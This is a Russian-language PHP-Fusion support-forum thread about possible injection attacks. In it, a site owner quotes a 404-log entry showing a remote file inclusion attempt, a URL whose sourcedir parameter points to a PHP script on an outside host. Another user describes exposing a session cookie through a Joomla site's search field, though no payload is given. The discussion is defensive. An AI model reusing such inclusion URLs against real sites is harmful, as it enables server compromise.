Просмотр темы
SQL-инъекция в PHP-Fusion
|
|
Pisatel |
Опубликовано 18.05.2013 10:07
|
Ветеран Сообщений: 678 Зарегистрирован: 08.02.2013 05:51 |
Господа, всем здравствуйте! Сегодня в логах 404 ошибок обнаружил следующее:http://www.meweb.ru/article14-sitemapxml-delaem-kartu-sayta&sa=U&ei=BuqWUeOnM4TZsgaWgYHQAQ&ved=0CJ0CEBYwTThk&usg=AFQjCNHs6wozSISlkcJWxXXHnxxfjM2owA//?sourcedir=http://ss.genua.ispgate.biz/ccs_ware/gd/fire/kun.php?? То есть кто-то пытался подключать внешние файлы, верно ли я понимаю? Есть ли повод для беспокойства? Инородных файлов, вроде, не обнаружил пока... |
|
|
Polarfox |
Опубликовано 18.05.2013 13:52
|
Администратор Разработчики Группа поддержки Сообщений: 3384 Зарегистрирован: 20.08.2010 14:03 |
Было бы куда подключать.
Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
|
|
|
util |
Опубликовано 06.06.2013 17:56
|
Ветеран Сообщений: 666 Зарегистрирован: 13.09.2010 13:10 |
Не знаю, может читали по поводу Drupal: http://www.openne...?num=37057 И ещё, сам пока не копался, спрошу по фуджику - а ввод в поле логин проверяется? Или по умолчанию подразумевается, что пользователь будет вводить только корректные данные? Счастлив не тот, кто получает подарок, а тот, кто подарок делает.
|
|
|
jikaka |
Опубликовано 06.06.2013 18:05
|
Супер Администратор Разработчики Сообщений: 4845 Зарегистрирован: 26.07.2010 12:10 |
ты имеешь ввиду при регистрации?
|
|
|
util |
Опубликовано 06.06.2013 18:42
|
Ветеран Сообщений: 666 Зарегистрирован: 13.09.2010 13:10 |
Не только, и при заходе зареганного. Проверяется ли и как - то, что вставляется в запрос и в базу? Изменил(а) util, 06.06.2013 18:48 Счастлив не тот, кто получает подарок, а тот, кто подарок делает.
|
|
|
Polarfox |
Опубликовано 06.06.2013 19:45
|
Администратор Разработчики Группа поддержки Сообщений: 3384 Зарегистрирован: 20.08.2010 14:03 |
Пусть нормально пишут, еще проверять... А вообще с чего такие вопросы, про самое очевидное? Вроде там ничо нет про логины. Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
|
|
|
util |
Опубликовано 06.06.2013 22:26
|
Ветеран Сообщений: 666 Зарегистрирован: 13.09.2010 13:10 |
На сайте t*******.info (джумла) вбил в поле "поиск по сайту" некую короткую комбинацию, скрипт, и получил сообщение - cookie: PHPSESSID=**************************, - идентификатор сессии пользователя.. Поэтому и задал вопрос по фуджику. Счастлив не тот, кто получает подарок, а тот, кто подарок делает.
|
|
|
Polarfox |
Опубликовано 07.06.2013 13:45
|
Администратор Разработчики Группа поддержки Сообщений: 3384 Зарегистрирован: 20.08.2010 14:03 |
Still don't get it... И что, с того в жумле сессия - у нас от этого логин уязвим? Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
|
|
Поделиться этой темой | |
Социальные закладки: | |
URL: | |
BBcode: | |
HTML: |
Перейти на форум: |